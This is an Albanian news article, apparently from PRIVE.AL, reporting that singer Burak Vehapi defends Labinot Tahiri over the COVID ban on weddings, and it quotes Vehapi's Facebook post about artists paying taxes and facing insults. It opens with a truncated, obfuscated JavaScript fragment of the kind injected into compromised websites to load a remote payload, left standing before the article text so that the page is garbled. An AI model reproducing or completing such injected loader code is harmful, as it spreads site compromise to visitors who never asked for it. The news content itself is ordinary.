;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Këngëtari shqiptar i del në mbrojtje Labinot Tahirit

By

Burak Vehapi, këngëtari kryesor i grupit FAMA, i ka dalë në mbrojtje Labinot Tahirit i cili pak ditë më parë ka thënë përmes rrjeteve sociale, se ndalimi i dasmave apo ahengjeve të ndryshme familjare, për shkak të koronavirusit, do t’i dëmtojë artistët.

Qëndrimit të tij i doli kundër Leonora Jakupi duke thënë se ka persona më të varfër se artistët por Burak Vehapi tha diçka të kundërt dhe kërkoi nga njerëzit të mos e ofendojnë Labin.

Më poshtë mund ta shihni statusin e tij të bërë në rrjetin social Facebook.

Te dashur miq ,

Pasiqe u hap nje debat rreth vendimit te Ministrise se Shendetesise, lidhur me mos mbajtjen e ahengjeve kete vit, kam marr shume pyetje nga shume kolege dhe miq , e ne veqanti nga dasmoret qe na kane kontraktuar .

Por po shoh shume sulme nga njerez te ndryshem, komente fyese ndaj te gjithe neve qe jemi aktiv ne veqanti ne dasma. Sinqerisht ne qe merremi me muzike, nuk jemi te mesuar me bo politike e me ofendu e me u marr me keto pune, por vendimi i fundit ka ngrit nje debat shume interesant, me shume mendime negative rreth njerzve qe merren me kete veprimtari (e sidomos kengetaret ) , e kjo eshte e habitshme .

E me i ra shkurt kesaj pune : Per te gjithe juve qe akuzoni e shani e thoni me bindje qe NE NUK PAGUAJME TATIM, nese keni fakte dergoni ne prokurori, ose thirrni ne ATK dhe ata pergjigjen per keto pune .

Ne kemi fakte me ju demantu , jemi ne rregull me shtetin prandaj nga shteti presim , sigurisht qe ne kohen e duhur cdo vendim kemi me respektu por KEMI TE DREJTE TE SHPRESOJME qe mos te ngutemi e te marrim vendime para kohe , e kjo besoj qe eshte deshira dhe kerkesa e shume kolegeve te mij, bashkepunetoreve qe preken direkt nga kjo situate.

Mos u bani marak, muzikantet e gastronomet me se paku kane mundesi ose hiq me keqperdor shtetin, ngriteni zanin aty ku duhet aty ku pernime ju vjedhin cdo dite buken e gojes, e mundesite per nje jete me te mire . Ne me nje sezone prej 2 muaj nuk besoj se i bejme dem KOSOVES.

Per pjeset tjera, shija eshte relative, dikuj i pelqen e dikuj jo, per kete vleresohesh ne treg, por nuk ka nevoje per ofendime .

Poashtu e ndjej obligim moral si kolege te radhitem prapa

Labinot Tahiri

, me shqetesimin e tij te drejte. Ai deshti te behej zeri yne dhe nuk i meriton ofendimet e marra .

Uroj qe secili te del mire nga kjo situate, edhe me shendet, edhe psiqikisht, edhe ekonomikisht. Jemi shume vend i vogel e me shume veshtersi per te uruar per tjetrin te keqen , ishalla secili ka mundesi te punoj ne fushen e vet, vetem me shku perpara.

Vendimet do ti respektojme, e pse brengosemi besoj eshte krejt normale./PRIVE.AL

Artikuj të ngjashëm